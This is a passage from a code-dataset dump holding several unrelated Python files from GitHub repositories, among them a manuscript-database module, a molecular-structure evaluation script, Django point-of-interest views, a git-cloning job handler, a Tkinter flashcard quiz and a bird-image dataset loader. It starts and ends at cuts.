except Error as err:\n print(f\"Error accessing Author database: {err}\")\n\n\n########### submit_response ###########\ndef submit_response(man_id, mycursor):\n get_status_sql = \"SELECT ManStatus, DateUpdated FROM Manuscript WHERE ManuscriptId = %s\"\n val = (man_id, )\n try:\n mycursor.execute(get_status_sql, val)\n res = mycursor.fetchone()\n print(f\"Recieved manuscript with unique ID: {man_id}\")\n print(f\"Manuscript {man_id} Status: {res[0]}\")\n print(f\"Manuscript {man_id} recieved at: {res[1]}\")\n except Error as err:\n print(f\"Error getting manuscript information: {err}\")\n\n\n\n########### submit_manuscript ###########\n# We must: \n# INSERT INTO Manuscript (Title, ICode) VALUES (%s, %s)\n# INSERT INTO AuthorGroup (ManuscriptId, AuthorId, OrderNum) VALUES (%s, %s, %s)\n# Check if other authors are in the Author database\n# If they are not, add them.\n# FOR EACH AUTHOR: \n# INSERT INTO AuthorGroup (ManuscriptId, AuthorId, OrderNum) VALUES (%s, %s, %s)\ndef submit_manuscript(user, mycursor, title, icode, authors, filename):\n # Check permissions of user\n if user.get_id() == None:\n print(\"You do not have the proper permissions for this action. 
Please log in with you Author ID to submit a manuscript.\")\n return None\n \n \n # Insert the manuscript\n insert_man_sql = \"INSERT INTO Manuscript (Title, ICodeId) VALUES (%s, %s)\"\n vals = (title, icode)\n man_id = None\n try:\n mycursor.execute(insert_man_sql, vals)\n man_id = mycursor.lastrowid\n\n except Error as err:\n print(f\"Error inserting manuscript: {err}\")\n return None\n\n # If the manuscript was inserted, add primary author to author group\n if man_id != None:\n insert_primary_sql = \"INSERT INTO AuthorGroup (ManuscriptId, AuthorId, OrderNum) VALUES (%s, %s, %s)\"\n vals = (man_id, user.get_id(), 1)\n try: \n mycursor.execute(insert_primary_sql, vals)\n except Error as err:\n print(f\"Error inserting primary author: {err}\")\n return None\n \n # Check for additional authors\n if len(authors) != 0: \n for i in range(len(authors)):\n a = authors[i]\n fname, lname = a.split(\" \")\n # check if the author is already in the database\n co_id = check_author(mycursor, fname, lname, i)\n\n # if not, insert the author to the database\n if co_id == None: \n try: \n insert_user = \"INSERT INTO SysUser (UserType) VALUES (%s)\"\n u = (\"author\", )\n mycursor.execute(insert_user, u)\n co_id = mycursor.lastrowid\n\n insert_co_sql = \"INSERT INTO Author (AuthorId, AuthorFirstName, AuthorLastName) VALUES (%s, %s, %s)\"\n vals = (co_id, fname, lname)\n \n mycursor.execute(insert_co_sql, vals)\n \n except Error as err:\n print(f\"Error inserting co-author: {err}\")\n # delete manuscript?\n return None\n \n # if the author was in the database\n else:\n insert_group = \"INSERT INTO AuthorGroup (ManuscriptId, AuthorId, OrderNum) VALUES (%s, %s, %s)\"\n print(f\"Author Group ID: {co_id}\")\n vals = (man_id, co_id, i)\n try: \n mycursor.execute(insert_group, vals)\n except Error as err:\n print(f\"Error inserting to Author Group: {err}\")\n \n submit_response(man_id, mycursor)\n return man_id\n\n\n########### status ###########\ndef author_status(mycursor, user):\n try: \n print(\"######### MANUSCRIPT STATUSES #########\")\n statuses = [\"Recieved\", \"Under Review\", \"Rejected\", \"Accepted\", \"Typesetting\", \"Ready\", \"Scheduled\", \"Published\"]\n counts = {}\n for status in statuses:\n get_count = \"SELECT COUNT(ManStatus) FROM LeadAuthorManuscripts WHERE AuthorId = %s AND ManStatus = %s\"\n vals = (user.get_id(), status)\n mycursor.execute(get_count, vals)\n res = mycursor.fetchone()[0]\n counts[status] = res\n \n for c in counts: \n print(f\"{c}: {counts[c]}\")\n # mycursor.execute(status_sql, val)\n # res = mycursor.fetchall()\n \n # output = \"Manuscript Statuses \\n############## \\n Recieved \\n ############## \\n\"\n # for x in res:\n # print(x)\n except Error as err:\n print(f\"Error in getting author manuscripts: {err}\")\n\n \n\n\n\n\n\n\n \n \n\n \n\n \n\n\n\n\n \n\n \n\n\n","repo_name":"abbyowen/lab2cosc61_abby_annie","sub_path":"author_operations.py","file_name":"author_operations.py","file_ext":"py","file_size_in_byte":7097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"15842679221","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 4 11:56:22 2020\n\nThis script assesses what ranking metric is best at ranking\nstructures according to MCS or FP similarity to the true structure.\n\nThis should give an independent assessment from the identity case.\nIf the results differ markedly, we'll have to wonder why.\n\n@author: stravsm\n\"\"\"\n\n\nimport os\nimport sys\nsys.path.append(os.environ['MSNOVELIST_BASE'])\n\nimport numpy as np\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nimport infrastructure.score as msc\nimport infrastructure.utils as utils\nimport fp_management.database as db\n\nfrom fp_management import fingerprint_map as fpm\nimport smiles_config as sc\n\nimport time\nimport pickle\nfrom tqdm import tqdm\n# Setup logger\nimport logging\n\nfrom rdkit import Chem\n\nimport h5py\n\nremove_perfect_match = False\nranking_score = \"score_mod_platt\"\nf1_cutoff = 0.5\n\nlogging.basicConfig(format='%(asctime)s - %(message)s', \n datefmt='%d-%b-%y %H:%M:%S')\nlogger = logging.getLogger(\"MSNovelist\")\nlogger.setLevel(logging.INFO)\nlogger.info(\"evaluation_summary startup\")\n\npicklepath = sc.config.get(\"evaluation_picklepath\", {})\n\nfp_map = fpm.FingerprintMap(sc.config[\"fp_map\"])\n\neval_id = str(int(time.time()))\neval_counter = 0\npickle_id = eval_id\nif sc.config['eval_id'] != '':\n eval_id = sc.config['eval_id']\nif sc.config['eval_counter'] != '':\n eval_counter = sc.config['eval_counter']\n pickle_id = sc.config['eval_id'] + \"-\" + sc.config['eval_counter']\n picklepath = {pickle_id: sc.config[\"eval_folder\"] + \"eval_\" + pickle_id + \".pkl\"}\nelse:\n sc.config[\"model_tag\"] = list(picklepath.keys())[0]\n \nsc.config.setdefault('cv_fold', 0)\ncv_fold = sc.config[\"cv_fold\"]\nevaluation_set_ = sc.config['evaluation_set']\nevaluation_set = f\"fold{cv_fold}-{evaluation_set_}\"\n\npicklepath_coverage_ref = sc.config[\"coverage_baseline\"]\n\nevaluation_logger = utils.EvaluationLogger(\"coverage\", sc.config, \n eval_id, eval_counter, pickle_id)\n\ndef check_dict(v):\n if isinstance(v, dict):\n return v[evaluation_set]\n else:\n return v\n\n\nresults_complete = {k: pickle.load(open(pp, 'rb')) for k, pp in picklepath.items()}\nresults_complete = {k: check_dict(v) for k, v in results_complete.items()}\nresults_complete = pd.concat([r[[\"nn\", \"mol\", \"mol_ref\", \n \"fingerprint\", \"fingerprint_ref\", \"fingerprint_ref_true\", \n \"inchikey1\", \"inchikey1_ref\",\n \"score\"]].assign(source = k)\n for k, r in results_complete.items()])\nn_total_ = len(set(results_complete[\"nn\"]))\n\nnn_in_results = set(results_complete[\"nn\"])\n\ncoverage_ref_ = pickle.load(open(picklepath_coverage_ref, 'rb'))\ncoverage_ref = coverage_ref_[evaluation_set]\ncoverage_ref = coverage_ref.loc[lambda row: row[\"mf\"] == row[\"mf_ref\"]]\ncoverage_ref = coverage_ref.loc[coverage_ref[\"nn\"].isin(nn_in_results)]\ncoverage_ref = msc.compute_candidate_scores(coverage_ref, fp_map, \n additive_smoothing_n = n_total_,\n f1_cutoff = f1_cutoff)\n\n\ncoverage_max = coverage_ref.groupby(\"nn\")[ranking_score].agg(max_score_cov = max)\n\n\nresults_ok = results_complete.loc[results_complete[\"fingerprint\"].notna()].copy()\n\n\nif remove_perfect_match:\n results_ok = results_ok.loc[\n results_ok[\"inchikey1\"] != results_ok[\"inchikey1_ref\"]]\n\n\nresults_ok = msc.compute_candidate_scores(results_ok, fp_map, \n additive_smoothing_n = n_total_,\n f1_cutoff = f1_cutoff)\nresults_ok = results_ok.merge(coverage_max, on = \"nn\", how = 
\"left\")\nresults_ok[\"overcount\"] = results_ok[ranking_score] > results_ok[\"max_score_cov\"]\n\nn_results_ok = len(results_ok)\nlogger.info(f\"Computing coverage for {n_results_ok} results with correct MF\")\n\nresults_coverage_ = results_ok.merge(\n coverage_ref[[\"nn\", \"inchikey1\", \"score\"]],\n how='right',\n left_on = [\"nn\", \"inchikey1\"],\n right_on = [\"nn\", \"inchikey1\"],\n suffixes = ['', '_cov']\n )\nresults_coverage = results_coverage_.groupby(\"nn\").agg(\n coverage = (\"source\", lambda ser: sum(ser.notna())),\n ratio = (\"source\", lambda ser: sum(ser.notna() / len(ser))),\n total = (\"source\", len),\n overcount = (\"overcount\", lambda ser: 0. + sum(ser)))\n\n\ncoverage_summary = coverage_ref.groupby(\"nn\").first()[[\"mol_ref\", \"fingerprint_ref_true\", \"fingerprint_ref\"]]\ncoverage_summary = msc.compute_fp_quality_mw(coverage_summary, fp_map) \ncoverage_summary = coverage_summary.join(results_coverage)\ncoverage_summary[\"rank\"] = coverage_summary[\"ratio\"].rank(ascending=False, method='first')\ncoverage_summary[\"value\"] = coverage_summary[\"ratio\"]\ncoverage_summary[\"eval_score\"] = \"coverage\"\ncoverage_summary[\"eval_metric\"] = \"coverage\"\nevaluation_logger.append_csv(\"rank\", coverage_summary)\n\n\ncoverage_summary.sort_values(\"predicted_fp_quality\", ascending=False, inplace=True)\ncoverage_summary[\"index\"] = np.arange(len(coverage_summary))\ncoverage_summary[\"coverage_sum\"] = np.cumsum(coverage_summary[\"coverage\"])\ncoverage_summary[\"total_sum\"] = np.cumsum(coverage_summary[\"total\"])\ncoverage_summary[\"running_coverage\"] = coverage_summary.apply(lambda row:\n row[\"coverage_sum\"] / row[\"total_sum\"],\n axis=1)\n \n\n\n\nplt.scatter(coverage_summary[\"predicted_fp_quality\"], coverage_summary[\"ratio\"])\n\nfig, (ax1, ax2) = plt.subplots(2, 1)\nax1.invert_xaxis()\nax1.plot(\n coverage_summary[\"predicted_fp_quality\"],\n np.cumsum(coverage_summary[\"total\"])\n )\nax1.plot(\n coverage_summary[\"predicted_fp_quality\"],\n np.cumsum(coverage_summary[\"coverage\"])\n )\nax2.invert_xaxis()\nax2.scatter(\n coverage_summary[\"predicted_fp_quality\"],\n coverage_summary[\"ratio\"],\n )\nax2.plot(\n coverage_summary[\"predicted_fp_quality\"],\n coverage_summary[\"running_coverage\"],\n )\nax2.plot(\n coverage_summary.rolling(window=10)[\"predicted_fp_quality\"].mean(),\n coverage_summary.rolling(window=10)[\"ratio\"].mean())\n\n\ncoverage_summary.sort_values(\"mol_weight\", ascending=True, inplace=True)\ncoverage_summary[\"index\"] = np.arange(len(coverage_summary))\ncoverage_summary[\"coverage_sum\"] = np.cumsum(coverage_summary[\"coverage\"])\ncoverage_summary[\"total_sum\"] = np.cumsum(coverage_summary[\"total\"])\ncoverage_summary[\"running_coverage\"] = coverage_summary.apply(lambda row:\n row[\"coverage_sum\"] / row[\"total_sum\"],\n axis=1)\n\n\n\nfig, (ax1, ax2) = plt.subplots(2, 1)\nax1.plot(\n coverage_summary[\"mol_weight\"],\n np.cumsum(coverage_summary[\"total\"])\n )\nax1.plot(\n coverage_summary[\"mol_weight\"],\n np.cumsum(coverage_summary[\"coverage\"])\n )\nax2.scatter(\n coverage_summary[\"mol_weight\"],\n coverage_summary[\"ratio\"],\n )\nax2.plot(\n coverage_summary[\"mol_weight\"],\n coverage_summary[\"running_coverage\"],\n )\nax2.plot(\n coverage_summary.rolling(window=10)[\"mol_weight\"].mean(),\n 
coverage_summary.rolling(window=10)[\"ratio\"].mean())\n\n\n\n\n","repo_name":"meowcat/MSNovelist","sub_path":"evaluation/top_rediscovery.py","file_name":"top_rediscovery.py","file_ext":"py","file_size_in_byte":7250,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"79"}
+{"seq_id":"13026036709","text":"#!/usr/bin/python -tt\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport matplotlib.cm as cm\n\ntestdata = pd.read_csv('mnist-test-labeled.csv')\ntraindata = pd.read_csv('train.csv')\n\n#Print the average digit images for the two datasets\ndef extract_digit(n,dset):\n dic = {}\n for index, row in dset.iterrows():\n key = row['label']\n if key not in dic:\n dic[key] = []\n dic[key].append(row)\n img = pd.DataFrame(dic[n])\n mean = img.describe().loc['mean'].values\n return mean\n\ndef transfer(digit_pixel):\n img_matrix = np.zeros((28,28))\n for i in range(0,27):\n for j in range (0,27):\n index = i * 28 + j\n img_matrix[i][j] =digit_pixel[index+1]\n return img_matrix\n\n\ndef displayTrain(digit,dset):\n mean = extract_digit(digit,dset)\n img = transfer(mean)\n plt.imshow(img,cmap=cm.binary)\n fname = 'trainAvg' + str(digit)+'.png'\n plt.savefig(fname)\n\ndef displayTest(digit,dset):\n mean = extract_digit(digit,dset)\n img = transfer(mean)\n plt.imshow(img,cmap=cm.binary)\n fname = 'testAvg' + str(digit)+'.png'\n plt.savefig(fname)\n \nfor i in range(10):\n displayTrain(i,traindata)\n displayTest(i,testdata)","repo_name":"ujkharel/Kaggle-Digit-Recognizer-Competition","sub_path":"AveragePic.py","file_name":"AveragePic.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"6781024010","text":"def reverseParentheses(strr, lenn):\n st = []\n for i in range(lenn):\n \n # Push the index of the current\n # opening bracket\n if (strr[i] == '('):\n st.append(i)\n \n # Reverse the substring starting\n # after the last encountered opening\n # bracket till the current character\n elif (strr[i] == ')'):\n temp = strr[st[-1]:i + 1]\n strr = strr[:st[-1]] + temp[::-1] + \\\n strr[i + 1:]\n del st[-1]\n \n # To store the modified string\n res = \"\"\n for i in range(lenn):\n if (strr[i] != ')' and strr[i] != '('):\n res += strr[i]\n return res\n \n \n\ndef solution(inputString):\n lenn = len(inputString)\n \n return reverseParentheses(inputString, lenn)\n\nstring = 'foo(bar(baz))blim'\nprint(solution(string))\n","repo_name":"aoamusat/codes","sub_path":"py/reverse_in_parentheses.py","file_name":"reverse_in_parentheses.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"1768182203","text":"import os\nimport urllib.parse\n\nfrom jobserv_runner.handlers.simple import HandlerError, SimpleHandler\n\n\nclass GitPoller(SimpleHandler):\n def _get_http_clone_token(self, clone_url):\n secrets = self.rundef.get('secrets', {})\n if clone_url.startswith('https://github.com'):\n tok = secrets.get('githubtok')\n if tok:\n return tok\n\n # we can't determine by URL if its a gitlab repo, so just assume\n # the rundef/secrets are done sanely by the user\n env = self.rundef['env']\n user = env.get('gitlabuser') or secrets.get('gitlabuser')\n if user:\n token = self.rundef['secrets']['gitlabtok']\n return user + ':' + token\n\n def _clone(self, log, dst):\n clone_url = self.rundef['env']['GIT_URL']\n log.info('Clone_url: %s', clone_url)\n\n token = self._get_http_clone_token(clone_url)\n if token:\n log.info('Using an HTTP token for cloning')\n p = urllib.parse.urlsplit(clone_url)\n clone_url = p.scheme + '://' + token + '@' + p.netloc + p.path\n\n if not log.exec(['git', 'clone', clone_url, dst]):\n raise HandlerError(\n 'Unable to clone: ' + self.rundef['env']['GIT_URL'])\n\n sha = self.rundef['env'].get('GIT_SHA')\n if sha:\n log.info('Checking out: %s', sha)\n if not log.exec(['git', 'branch', 'jobserv-run', sha], cwd=dst):\n raise HandlerError('Unable to branch: ' + sha)\n if not log.exec(['git', 'checkout', 'jobserv-run'], cwd=dst):\n raise HandlerError('Unable to checkout: ' + sha)\n\n def prepare_mounts(self):\n mounts = super().prepare_mounts()\n\n repo_dir = os.path.join(self.run_dir, 'repo')\n with self.log_context('Cloning git repository') as log:\n self._clone(log, repo_dir)\n mounts.append((repo_dir, '/repo'))\n self.container_cwd = '/repo'\n return mounts\n\n\nhandler = GitPoller\n","repo_name":"ursinha/jobserv","sub_path":"runner/jobserv_runner/handlers/git_poller.py","file_name":"git_poller.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"27518250309","text":"from django.http import HttpResponse, HttpResponseNotFound\nfrom django.views.decorators.csrf import csrf_exempt\nfrom server.database import get_poi_coords, get_poi_types\nfrom server.config import route_poi\nimport json,logging,ast\nfrom collections import defaultdict\nimport cPickle as pic\n\n@csrf_exempt\ndef get_coords(request):\n with open ('server/poi_coord_route.py') as f:\n lines = f.read().splitlines()\n \n route_poi = map(int, lines)\n tags = request.POST.getlist(\"tags\")\n available_tags = get_poi_types()\n\n for tag in tags:\n if tag not in available_tags:\n return HttpResponseNotFound(\"One of your tags does not exist.\")\n\n return HttpResponse(json.dumps({\"coords\": get_poi_coords(tags,route_poi)}))\n\n\n@csrf_exempt\ndef get_types(request):\n return HttpResponse(json.dumps({\"types\": get_poi_types()}))\n\n@csrf_exempt\ndef save_coords(request):\n try:\n ele = request.POST.getlist(\"elements\")\n name = str(request.POST.get(\"name\"))\n if name.isspace():\n logging.error('saving POis failed since there is no name or there is space in the name',exc_info=True)\n return HttpResponse(\"Json not Saved\")\n\n else:\n filename = \"/home/kthiruko/newbackend_rust/data/poisets/%s.json\" %name\n \n ## I have no idea whyy we get 2 square brackets while writing to a json file so did some stuff to make it right\n json_data = {\"elements\" : map (ast.literal_eval , ele) , \"name\": name}\n struct_element = map (ast.literal_eval , ele)\n d = defaultdict(list)\n d[\"elements\"] = struct_element\n d[\"name\"]=name\n json_d = json.dumps(d)\n data = json.loads(json_d)\n temp = data[\"elements\"]\n data[\"elements\"] = temp[0]\n # what1 = json.dumps(what)\n # print what1\n\n with open(filename, 'w') as outfile:\n json.dump(data,outfile)\n \n return HttpResponse(\"Json Saved\")\n \n except:\n logging.error('saving POis failed',exc_info=True)\n return HttpResponse(\"Json not Saved\")","repo_name":"oSoc17/lopeningent_backend","sub_path":"server/server/interface/pois.py","file_name":"pois.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"}
+{"seq_id":"12106839337","text":"from tkinter import *\r\nfrom PIL import ImageTk,Image\r\nfrom random import randint\r\nimport random\r\n\r\nroot = Tk()\r\nroot.title(\"flashcards\")\r\nroot.iconbitmap(\"icons/superman.ico\")\r\nroot.geometry(\"600x600\")\r\n\r\n#creating a menubar\r\nmy_menu = Menu(root)\r\nroot.config(menu=my_menu)\r\n\r\nresult=0\r\n\r\n#create randpm chnage function\r\ndef change():\r\n \r\n global list1\r\n global rando\r\n #creating a list\r\n list1 = ['ntr_np','ntr_tem','ntr_jlk','prabhas','mahesh_sri',\r\n 'mahesh_ban','mahesh_maha']\r\n \r\n #creating a random int\r\n rando = randint(0,len(list1)-1)\r\n states = \"angel/\" + list1[rando] + \".png\"\r\n \r\n #inserting our images\r\n global my_label\r\n global my_pic\r\n my_pic = ImageTk.PhotoImage(Image.open(states))\r\n my_label.config(image=my_pic,bg=\"white\")\r\n \r\n \r\n#calling submitt button\r\n\r\ndef submit():\r\n global answer\r\n answer = e1.get().lower()\r\n if answer == list1[rando]:\r\n \r\n result = \"correct it is\" +\" \" + list1[rando]\r\n else:\r\n result = \"incorrect it is not correct answer\"\r\n my_label1 = Label(hero_frame,text=result,font=\"arial,25\")\r\n my_label1.pack(pady=15)\r\n e1.delete(0,END)\r\n#calling functions\r\ndef heroes():\r\n global my_label\r\n removeall()\r\n hero_frame.pack(fill=BOTH,expand=1)\r\n my_label = Label(hero_frame)\r\n my_label.pack(pady=15)\r\n change()\r\n \r\n #creating a entrybox\r\n global e1\r\n e1 = Entry(hero_frame,width=30)\r\n e1.pack()\r\n #creating a next button\r\n button1 = Button(hero_frame,text=\"next\",command=heroes)\r\n button1.pack(pady=15)\r\n \r\n #button to show mwssage\r\n button2 = Button(hero_frame,text=\"submit\",command=submit)\r\n button2.pack()\r\n \r\n#calling select function\r\ndef select():\r\n if radio_cap.get()==names[answer]:\r\n result=\"correct\"\r\n answerlabel.config(text=result)\r\n\r\ndef movies():\r\n removeall()\r\n state_frame_movies.pack(fill=BOTH,expand=1)\r\n my_label = Label(state_frame_movies)\r\n my_label.pack()\r\n global list1\r\n global rando\r\n global names\r\n global answer\r\n list1 = ['ntr_np','ntr_tem','ntr_jlk','prabhas','mahesh_sri',\r\n 'mahesh_ban','mahesh_maha']\r\n \r\n names = {\"ntr_np\":'nanakuprematho',\"ntr_tem\":'temper',\"ntr_jlk\":'jailavakusa',\r\n \"prabhas\":'saaho',\"mahesh_sri\":'srimanthudu',\"mahesh_ban\":'bharath ane nenu',\"mahesh_maha\":'maharshi'}\r\n \r\n #creating a random int\r\n \r\n count=1\r\n answer_list = []\r\n while count<4:\r\n \r\n rando = randint(0,len(list1)-1)\r\n \r\n if count == 1:\r\n \r\n \r\n answer = list1[rando]\r\n global my_pic\r\n states = \"angel/\" + list1[rando] + \".png\"\r\n my_pic = ImageTk.PhotoImage(Image.open(states))\r\n my_label.config(image=my_pic)\r\n \r\n \r\n answer_list.append(list1[rando])\r\n list1.remove(list1[rando])\r\n random.shuffle(list1)\r\n count+=1\r\n \r\n global radio_cap\r\n radio_cap=StringVar()\r\n radio_cap.set(names[answer_list[0]])\r\n \r\n radio_button1 = Radiobutton(state_frame_movies,text=names[answer_list[0]],variable=radio_cap,value=names[answer_list[0]]).pack()\r\n radio_button2 = Radiobutton(state_frame_movies,text=names[answer_list[1]],variable=radio_cap,value=names[answer_list[1]]).pack()\r\n radio_button3 = Radiobutton(state_frame_movies,text=names[answer_list[2]],variable=radio_cap,value=names[answer_list[2]]).pack()\r\n \r\n #creating a next button\r\n \r\n nxt_button = Button(state_frame_movies,text=\"next\",command=movies)\r\n nxt_button.pack()\r\n \r\n #creating a select button\r\n \r\n btselect = 
Button(state_frame_movies,text=\"select\",font=\"arial,20\",command=select)\r\n btselect.pack(pady=15)\r\n \r\n #creating answer label\r\n global answerlabel\r\n answerlabel = Label(state_frame_movies,text=\" \",font=\"arial,20\")\r\n answerlabel.pack(pady=15)\r\n \r\n\r\n#removing framses and deleting childrens \r\ndef removeall():\r\n #looping through for deleting frame children\r\n for widget in hero_frame.winfo_children():\r\n widget.destroy()\r\n for widget in state_frame_movies.winfo_children():\r\n widget.destroy()\r\n \r\n hero_frame.pack_forget()\r\n state_frame_movies.pack_forget()\r\n \r\n#creating submenu titles\r\ntollywood_menu = Menu(my_menu)\r\nmy_menu.add_separator()\r\nmy_menu.add_cascade(label=\"tollywood\",menu=tollywood_menu)\r\ntollywood_menu.add_command(label=\"heroes\",command=heroes)\r\ntollywood_menu.add_command(label=\"movies\",command=movies)\r\ntollywood_menu.add_command(label=\"exit\",command=root.destroy)\r\n\r\nhero_frame = Frame(root,width=500,height=500,bg=\"white\")\r\nstate_frame_movies = Frame(root,width=500,height=500,bg=\"yellow\")\r\n\r\n\r\n\r\nroot.mainloop()\r\n\r\n\r\n","repo_name":"vishnuvardhan1807/tkinter-projects","sub_path":"flashcaeds.py","file_name":"flashcaeds.py","file_ext":"py","file_size_in_byte":4777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"20964646350","text":"import os\n#os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"-1\"\nimport tensorflow as tf\nimport numpy as np\n#from PIL import Image\n#import skimage\n#import tensorflow_datasets as tfds\n#import matplotlib.pyplot as plt\nfrom tensorflow.python.keras import backend as K\nfrom tqdm import tqdm\nimport pathlib\n\nBATCH_SIZE = 32\nIMG_HEIGHT = 448\nIMG_WIDTH = 448\nNUM_CLASSES = 200\n\n\nclass DataSet:\n\n def __init__(self, path_root):\n self.data_dir = pathlib.Path(path_root + '/CUB_200_2011/CUB_200_2011/images')\n self.image_path = path_root + \"/CUB_200_2011/CUB_200_2011/images/\"\n self.image_name_path = path_root + \"/CUB_200_2011/CUB_200_2011/images.txt\"\n self.semantics_path2 = path_root + \"/CUB_200_2011/CUB_200_2011/attributes/image_attribute_labels.txt\"\n self.semantics_path1 = path_root + \"/CUB_200_2011/attributes.txt\"\n self.split_path = path_root + \"/CUB_200_2011/CUB_200_2011/train_test_split.txt\"\n self.class_path = path_root + \"/CUB_200_2011/CUB_200_2011/classes.txt\"\n self.label_path = path_root + \"/CUB_200_2011/CUB_200_2011/image_class_labels.txt\"\n self.AUTOTUNE = tf.data.experimental.AUTOTUNE\n\n def load(self, GPU=True, train=True, batch_size=32):#discard\n index = self.get_split()\n if GPU:\n n = len(index)\n else:\n n = 50\n if train:\n #phi = self.get_phi(index)# Φ, semantic matrix, 28*200\n labels = self.get_label(n, index, set=0)\n images = self.get_image(n, index, set=0)\n else:\n labels = self.get_label(n, index, set=1)\n images = self.get_image(n, index, set=1)\n #phi = self.get_semantic(n, index, set=1) # φ, semantic features 28, n\n\n ds = tf.data.Dataset.from_tensor_slices((images, np.asarray(labels))).cache().shuffle(50).batch(batch_size).prefetch(tf.data.experimental.AUTOTUNE)\n\n return ds\n\n def prepare_for_training(self, ds, batch_size=32, cache=True):\n # This is a small dataset, only load it once, and keep it in memory.\n # use `.cache(filename)` to cache preprocessing work for datasets that don't\n # fit in memory.\n \"\"\"\n if cache:\n if isinstance(cache, str):\n ds = ds.cache(cache)\n else:\n ds = ds.cache()\n \"\"\"\n cache_dir = os.path.join(os.getcwd(), 'cache_dir')\n try:\n os.makedirs(cache_dir)\n except OSError:\n print('Cache directory already exists')\n cached = ds.cache(os.path.join(cache_dir, 'cache.temp'))\n ds = ds.shuffle(50).repeat().batch(batch_size).prefetch(tf.data.experimental.AUTOTUNE)\n\n return ds\n\n def get_label(self, n, index, set=0):\n file = open(self.label_path, \"r\")\n labels = file.readlines()\n label_new = []\n for i in range(n):\n if index[i] == set:\n label_new.append(int(labels[i].split(' ')[1].split('\\n')[0]) - 1)# start from 0\n\n return label_new\n\n def decode_img(self, img):\n # convert the compressed string to a 3D uint8 tensor\n img = tf.image.decode_jpeg(img, channels=3)\n # Use `convert_image_dtype` to convert to floats in the [0,1] range.\n img = tf.image.convert_image_dtype(img, tf.float32)\n # resize the image to the desired size.\n return tf.image.resize(img, [IMG_WIDTH, IMG_HEIGHT])\n\n def get_image(self, n, index, set=0):# discard\n images_names = open(self.image_name_path, \"r\")\n images = images_names.readlines()\n print(\"loading images...\")\n image_new = []\n for i in tqdm(range(n)):\n if index[i] == set:\n im_path = self.image_path + images[i].split(' ')[1].split('\\n')[0]\n #img = np.asarray(Image.open(im_path).resize((IMG_WIDTH, IMG_HEIGHT)), dtype=np.float32)\n img = tf.io.read_file(im_path)\n img = self.decode_img(img)\n # image = 
tf.keras.preprocessing.image.load_img(im_path, target_size=(IMG_WIDTH, IMG_HEIGHT))\n image_new.append(img)\n else:\n pass\n\n return image_new\n\n def get_attribute(self):\n file = open(self.semantics_path1, \"r\")\n lines = file.readlines()\n attributes = {}\n print(\"loading attributes...\")\n for line in lines:\n id = line.split(\" \")[0] # No. of attribute, 28 categories, 312 in total\n info = line.split(\" \")[1].split(\"::\")\n if info[0] in attributes.keys():\n attributes[info[0]] += [int(id)]\n else:\n attributes[info[0]] = [int(id)]\n\n return attributes\n\n def get_semantic(self, n, index, set=0, file_path=None):\n attributes = self.get_attribute()\n n_att = len(attributes.keys()) # 28\n birds_at = {}\n print(\"loading semantics...\")\n file = open(self.semantics_path2, \"r\")\n lines = file.readlines()\n for line in lines:\n id_bird = line.split(\" \")[0]\n if id_bird not in birds_at.keys():\n birds_at[id_bird] = np.zeros(n_att)\n\n id_att = int(line.split(\" \")[1])\n present = int(line.split(\" \")[2])\n if present:\n for i, key in enumerate(attributes.keys()):\n if id_att in attributes[key]:\n birds_at[id_bird][i] += np.where(np.array(attributes[key]) == id_att)[0][0]\n\n birds_semantics = [] # 11788*28 list\n for i, key in enumerate(birds_at.keys()):\n if i < n:\n if index[i] == set:\n birds_semantics.append(birds_at[key])\n else:\n pass\n else:\n break\n print(\"Finished!\")\n\n return np.asarray(birds_semantics)\n\n def get_split(self, index=True):\n file = open(self.split_path, \"r\")\n ids = file.readlines()\n if index:\n for i in range(len(ids)):#len(set)):\n ids[i] = int(ids[i].split(' ')[1].split('\\n')[0])\n return ids\n else:\n images_names = open(self.image_name_path, \"r\")\n images = images_names.readlines()\n print(\"splitting...\")\n train_list = []\n test_list = []\n for i in range(len(ids)):#len(set)):\n set = int(ids[i].split(' ')[1].split('\\n')[0])\n if set == 0:\n train_list.append(self.image_path + images[i].split(' ')[1].split('\\n')[0])\n else:\n test_list.append(self.image_path + images[i].split(' ')[1].split('\\n')[0])\n\n return tf.data.Dataset.from_tensor_slices(train_list), tf.data.Dataset.from_tensor_slices(test_list)#.cache()\n\n def get_phi(self):\n index = self.get_split(index=True)\n labels = self.get_label(len(index), index, set=0)\n semantics = self.get_semantic(len(index), index, set=0)\n phi = np.zeros((semantics[0].shape[0], max(labels)+1))\n lcount = {x:labels.count(x) for x in labels}\n for i in range(len(semantics)):\n phi[:, labels[i]] += semantics[i]\n for j in range(phi.shape[0]):\n phi[:, j] = phi[:, j] / lcount[j]\n\n return tf.convert_to_tensor(phi, dtype=tf.float32)\n\n def process_path(self, file_path):\n parts = tf.strings.split(file_path, '/')\n # The second to last is the class-directory\n label = int(tf.strings.split(parts[-2], '.')[0])# == self.CLASS_NAMES\n # load the raw data from the file as a string\n img = tf.io.read_file(file_path)\n img = self.decode_img(img)\n\n return img, label\n\n def load_gpu(self, batch_size=32):#autotune=4\n # Set `num_parallel_calls` so multiple images are loaded/processed in parallel.\n self.CLASS_NAMES = np.unique(\n np.array([item.name for item in self.data_dir.glob('[!.]*') if item.name != \"LICENSE.txt\"]))\n train_list_ds, test_list_ds = self.get_split(index=False)\n #dataset = train_list_ds.interleave(tf.data.TFRecordDataset, cycle_length=FLAGS.num_parallel_reads, num_parallel_calls=tf.data.experimental.AUTOTUNE)\n train_ds = train_list_ds.map(self.process_path, 
